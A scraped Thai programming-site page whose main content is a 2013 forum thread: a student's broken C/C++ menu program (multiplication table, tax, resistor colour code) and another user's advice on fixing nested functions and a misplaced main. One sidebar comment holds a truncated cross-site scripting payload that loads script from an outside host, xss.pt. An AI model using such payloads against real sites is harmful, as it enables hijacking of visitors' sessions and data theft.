หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  <a href="https://www.google.co.th">google</a> เลยค...
2020-03-10 17:07:03
  ไม่อยากเลยคับ [url=https://www.google.co.th]...
2020-03-10 17:05:36
  ขอโคํดเกมเศรษฐีหน่อยครั...
2020-02-09 22:50:58
  ขอโค้ดเกม เป่ายิ้งฉุบหน่...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง uninstall แล้วก็ลอง install...
2019-10-22 01:56:28
  ขอบคุณค่ะ คุณ maddog ลองทำดูแ...
2019-10-21 12:32:51
  ลองทำตามนี้ดู

https://stackoverflow.c...

2019-10-16 11:39:03
  ถ้าคนอื่นเขียนให้ แล้วมั...
2019-09-17 14:01:26
  ถ้าใช้ไฟฟ้า 0 หน่วยให้ขึ้...
2019-09-17 13:59:39
  Homework comment
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  ประเด็นแรก flowchart มันไม่มีภ...
2017-04-18 17:43:33
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 Webboard

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

กระทู้ #3403 [C]

ช่วยดูโค้ดให้หน่อยครับมัน error ไม่รู้จะแก้ยังไงดี

#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
#include <stdio.h>
#include <math.h>
#include <iostream>
#include <cctype>

int endselect()
{
printf("Prease any key to back to main menu.\r\n");
getch();
return 0;
}

int select1()
{
system("cls");
int number;
int i;
printf("Enter number : ");
scanf("%d", &number);

for(i = 1; i<=12;i++){
printf("%d x %d = %d\n", number, i, number*i);
}

return 0;
}
int select2()
{
system("cls");
int salary ;
float vat,allpay ;

printf("Enter yr salary:");
scanf("%d",&salary);
if (salary<5000)
{
vat=0;
}
else if (salary>=5000 && salary<=9999)
{
vat=salary*0.05;
}
else if (salary>=10000 && salary<=19999)
{
vat=salary*0.07;
}
else if (salary>20000)
{
vat=salary*0.10;
}
printf(" Vat = %.1f Bath\n",vat);
allpay = salary+vat;
printf(" AllPay = %.1f Bath\n",allpay);

return 0;
}

int select3()
{
system("cls");
using namespace std;

void getColorCode(char colorCode[]);
long getResistorValue(char colorCode[]);

char colorCode[3];

void main (int) { <<<<< [บรรทัดที่ 71 error]
long r_value = 0;
printf("This program will calculate the value of a resistor.\n\n");
printf("B = Black\nN = Brown\nR= Red\nO = Orange\nY = Yellow\n");
printf("G = Green\nL = Blue\nV = Violet\nE = Gray\nW = White\n\n");
printf("Enter the 4-character color description of the resistor: ");
getColorCode(colorCode);

r_value = getResistorValue(colorCode);
printf("\n\nThe resistor with color code %c %c %c has a value of %d Ohms.\n", colorCode[0], colorCode[1], colorCode[2], r_value);
return 0;
}

void getColorCode(char colorCode[]) {
int i;
for(i = 0; i < 4; i++)
colorCode[i] = getchar();
}

long getResistorValue( char colorCode[] ) {

int i;
double multiplier;
char band_color;
long value;
int colorValue[3];

for(i = 0; i < 3; i++) {
band_color = toupper(colorCode[i]);
switch (band_color) {
case('B'):
colorValue[i] = 0;
break;
case('N'):
colorValue[i] = 1;
break;
case('R'):
colorValue[i] = 2;
break;
case('O'):
colorValue[i] = 3;
break;
case('Y'):
colorValue[i] = 4;
break;
case('G'):
colorValue[i] = 5;
break;
case('L'):
colorValue[i] = 6;
break;
case('V'):
colorValue[i] = 7;
break;
case('E'):
colorValue[i] = 8;
break;
case('W'):
colorValue[i] = 9;
break;
default:
printf("\nERROR: Color Code %c is not a valid choice\n", colorCode[i]);
break;
}
}
multiplier = pow( 10, (double) colorValue[2]);
value = (((colorValue[0]*10) + colorValue[1]) * multiplier);
return value;
}

int menu()
return 0;
} <<<<<<[แจ้งเตือนบรรทัดนี้]

int main()
{ <<<<<<[บรรทัดmuj 154 error]
char quit;
int select,chk;
while(quit != 'y')
{
system("CLS");
printf("#############################\r\n");
printf("### Menu ###\r\n");
printf("1. Sudkoon\r\n");
printf("2. Calculate Tax\r\n");
printf("3. Calculate Resistor\r\n");
printf("Or other key to exit program\r\n");
printf("Select number(1-3) : ");
select = getch();
printf("\r\n");
chk = 0;
if(select == '1')
{
chk = select1();
}
if(select == '2')
{
chk = select2();
}
if(select == '3')
{
chk = select3();
}if(chk == 0)
{
printf("Do you want to exit program ? (y or n) : ");
quit = getch();
}
}
return 0;
}

มันerror 2 จุดอะครับ บรรทัดที่ 71 แล้วก็ บรรทัดที่ 154

บรรทัดที่ 71 error แบบนี้ครับ
71: Declaration syntax error in function select3()
บรรทัดที่ 154
154: Cannot overload 'main'
บรรทัดที่ 151 ขึ้นแจ้งเตือน
151: Function should return a value in function select3()
จากคุณ : prince / princebunner@gmail.com [2013-03-10 13:45:17]  

115.67.135.133 ความคิดเห็น #28790 (จาก IP: 115.67.135.133)
int menu(){.....}
จากคุณ : Maddog [2013-03-10 16:32:05]

115.67.135.133 ความคิดเห็น #28791 (จาก IP: 115.67.135.133)
ใน select3() ทำไม่ถึงเอาโค้ดมาใส่แบบนั้นหละ ผิดนะครับ
จากคุณ : Maddog [2013-03-10 16:40:03]

171.101.127.84 ความคิดเห็น #28792 (จาก IP: 171.101.127.84)
แล้วมันต้องทำไงอะครับ จะเปลี่ยน โค้ดก็ไม่ทันแล้วครับ มันต้องแก้ไงหรอ
จากคุณ : prince / princebunner@gmail.com [2013-03-10 17:40:05]

171.101.127.84 ความคิดเห็น #28793 (จาก IP: 171.101.127.84)
ช่วยหน่อยครับขอร้องละครับ ผมนั่งแก้มาเป็นวันแล้วครับ เข้ามาบอกแต่ใส่โค้ดผิดแต่ไม่บอกว่าผิดอย่างไร ผมไม่สามารถ ทราบได้ครับ ช่วย ชี้แจ้งด้วยครับ
จากคุณ : prince / princebunner@gmail.com [2013-03-11 01:50:38]

58.11.127.50 ความคิดเห็น #28794 (จาก IP: 58.11.127.50)
ผมว่าพื้นฐานคุณไม่แน่น ทำให้คุณมั่วโค้ด เช่น

int select3()
{
system("cls");
using namespace std;

void getColorCode(char colorCode[]);
long getResistorValue(char colorCode[]);

char colorCode[3];

void main (int) { <<<<< [บรรทัดที่ 71 error]
long r_value = 0;

ทำไม using มาอยู่ตรงนี้ แถมยังมี void main ใน function อีก เลยเดาว่าคุณเอาโค้ดคนอื่นมายำ โดยที่ไม่เข้าใจ

แนะนำว่าโค้ดต่อไปนี้ เอาไว้ในตำแหน่งที่มันควรจะอยู่ (พื้นฐาน) คือเอาไว้ด้านบน

using namespace std;

void getColorCode(char colorCode[]);
long getResistorValue(char colorCode[]);

และ void main ที่อยู่ใน select3() ให้นำออกมาข้างนอก(ไม่ได้อยู่ใน select3() แล้วทำการเปลี่ยนชื่อเป็นอย่างอื่น เช่น void select3_main()

จากนั้นก็ให้ทำการ comment โค้ดทั้งหมดก่อนแล้วค่อยๆ uncomment ออกให้มันทำงานทีละบรรทัด และ debug จนโค้ดทำงานได้ตาม error ที่เกิดขึ้น
จากคุณ : maddog [2013-03-11 10:09:54]

171.98.120.135 ความคิดเห็น #28795 (จาก IP: 171.98.120.135)
ขอบพระคุณครับที่ช่วยชี้แจ้ง ก็อย่างที่คุณว่า พื้นฐานผมไม่แน่นจริง ๆ เลยอ่านหนังสือไปทำไป ยัง งง ๆ อยู่เหมือนกัน ก็ขอขอบคุณแต่ที่บอกผมมั่วก็ขอบคุณด้วยเช่นกันเพราะผมใช้หลายคนช่วยมันอาจจะ มั่ว ๆ ขอบพระคุณครับ
จากคุณ : prince / princebunner@gmail.com [2013-03-11 11:57:01]

58.11.127.50 ความคิดเห็น #28797 (จาก IP: 58.11.127.50)
อ๋อ ใช้หลายคนเขียน ง่ายเลยครับ ให้แต่ละคนไปเขียนเป็น function แยกกัน แล้วนำ function มาประกอบรวมกับโปรแกรมหลัก

โค้ดที่คุณให้มาตอนแรกทำให้ผมรู้ว่า "กระบวนการรวม" ไม่ถูกต้องนั่นเอง

อ่านหนังสือยังไงก็ไม่กระจ่างเท่าลองเขียนแล้วเจอ error แล้วแก้ปัญหา (เรียกรวมๆว่า debug) "การเขียนโปรแกรมใช้ทักษะ ถ้าไม่เขียนถ้าไม่ทำ ก็จะทำไม่ได้"
จากคุณ : maddog [2013-03-11 12:07:42]

171.98.120.135 ความคิดเห็น #28798 (จาก IP: 171.98.120.135)
ขอบคุณสำหรับคำแนะนำครับ ผมจะลองดูเท่าที่จะทำได้ละกันครับ แต่ผมออกจะไม่หมั่นใจว่าจะทำได้เท่าไรเพราะโปรแกรมส่วนใหญ่ผมเขียนเอง เพื่อนช่วยอะไรไม่ค่อยได้เลยต้องพึ่งตัวเองน่ะครับ ถ้ามีอะไรสงสัยเดียวผมจะมาโพสถามอีก น่ะครับ ขอบคุณล่วงหน้าครับ
จากคุณ : prince / princebunner@gmail.com [2013-03-12 01:32:42]
ตอบกระทู้
  • ห้ามการโฆษณา หากต้องการติดต่อหาลูกค้า ติดต่อโฆษณาโดยตรงได้ที่ webmaster@sourcecode.in.th
  • ห้ามใช้คำหยาบและคำพูดที่ไม่เหมาะสม
  • ขอสงวนสิทธิหากตรวจพบ ข้อความที่ไม่เหมาะสม ข้อความนั้นจะถูกลบทันที
ชื่อ
อีเมล์
รายละเอียด

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 
 
7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI)
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI) ความละเอียดระดับ 4K
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th